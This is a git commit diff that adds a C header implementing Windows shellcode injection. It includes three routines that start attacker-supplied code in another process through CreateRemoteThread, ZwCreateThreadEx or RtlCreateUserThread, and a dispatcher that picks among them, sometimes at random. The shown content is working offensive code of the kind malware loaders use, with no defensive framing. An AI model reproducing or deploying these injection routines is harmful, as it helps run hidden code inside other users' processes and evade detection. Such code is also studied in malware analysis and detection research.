updates and moves

n/a
2026-06-16 07:49:24 +00:00 · 2022-04-11 20:00:13 -05:00
parent 1275ea2e03
commit 900263ea6f
809 changed files with 149115 additions and 1594 deletions
@@ -0,0 +1,89 @@
+#pragma once
+#include <stdio.h>
+#include "ntddk.h"
+#include "ntdll_undoc.h"
+
+typedef enum {
+    usingRandomMethod,
+    usingCreateRemoteThread,
+    usingZwCreateThreadEx,
+    usingRtlCreateUserThread,
+    CREATION_METHODS_SIZE
+} THREAD_CREATION_METHOD;
+
+bool run_shellcode_in_new_thread1(HANDLE hProcess, LPVOID remote_shellcode_ptr)
+{
+    NTSTATUS status = NULL;
+    //create a new thread for the injected code:
+    LPTHREAD_START_ROUTINE routine = (LPTHREAD_START_ROUTINE) remote_shellcode_ptr;
+
+    DWORD threadId = NULL;
+    HANDLE hMyThread = NULL;
+    if ((hMyThread = CreateRemoteThread(hProcess, NULL, NULL, routine, NULL, CREATE_SUSPENDED, &threadId)) == NULL) {
+        printf("[ERROR] CreateRemoteThread failed, status : %x\n", GetLastError());
+        return false;
+    }
+    printf("Created Thread, id = %x\n", threadId);
+    printf("Resuming added thread...\n");
+    ResumeThread(hMyThread); //injected code
+    return true;
+}
+
+bool run_shellcode_in_new_thread2(HANDLE hProcess, LPVOID remote_shellcode_ptr)
+{
+    NTSTATUS status = NULL;
+    HANDLE hMyThread = NULL;
+    //create a new thread for the injected code:
+    if ((status = ZwCreateThreadEx(&hMyThread, 0x1FFFFF, NULL, hProcess, remote_shellcode_ptr, NULL, CREATE_SUSPENDED, 0, 0, 0, 0)) != STATUS_SUCCESS)
+    {
+        printf("[ERROR] ZwCreateThreadEx failed, status : %x\n", status);
+        return false;
+    }
+    printf("Created Thread, id = %x\n", GetThreadId(hMyThread));
+    printf("Resuming added thread...\n");
+    ResumeThread(hMyThread); //injected code
+    return true;
+}
+
+bool run_shellcode_in_new_thread3(HANDLE hProcess, LPVOID remote_shellcode_ptr)
+{
+    NTSTATUS status = NULL;
+    HANDLE hMyThread = NULL;
+    CLIENT_ID cid;
+    //create a new thread for the injected code:
+    
+    if ((status = RtlCreateUserThread(hProcess, NULL, true, 0, 0, 0, remote_shellcode_ptr, NULL, &hMyThread, &cid)) != STATUS_SUCCESS)
+    {
+        printf("[ERROR] RtlCreateUserThread failed, status : %x\n", status);
+        return false;
+    }
+    printf("Created Thread, id = %x\n", GetThreadId(hMyThread));
+    printf("Resuming added thread...\n");
+    ResumeThread(hMyThread); //injected code
+    return true;
+}
+
+//---
+bool run_shellcode_in_new_thread(HANDLE hProcess, LPVOID remote_shellcode_ptr, DWORD method)
+{
+    bool isSuccess = false;
+    DWORD max = CREATION_METHODS_SIZE - 1;
+    DWORD random = (GetTickCount() * 1000) % max + 1;
+    if (method > max || method <= usingRandomMethod) method = random;
+
+    printf("Injecting by method, id = %x\n", method);
+    switch (method) {
+    case usingCreateRemoteThread:
+        isSuccess = run_shellcode_in_new_thread1(hProcess, remote_shellcode_ptr);
+        break;
+    case usingZwCreateThreadEx:
+        isSuccess = run_shellcode_in_new_thread2(hProcess, remote_shellcode_ptr);
+        break;
+    case usingRtlCreateUserThread:
+        isSuccess = run_shellcode_in_new_thread3(hProcess, remote_shellcode_ptr);
+        break;
+    default:
+        return false;
+    }
+    return isSuccess;
+}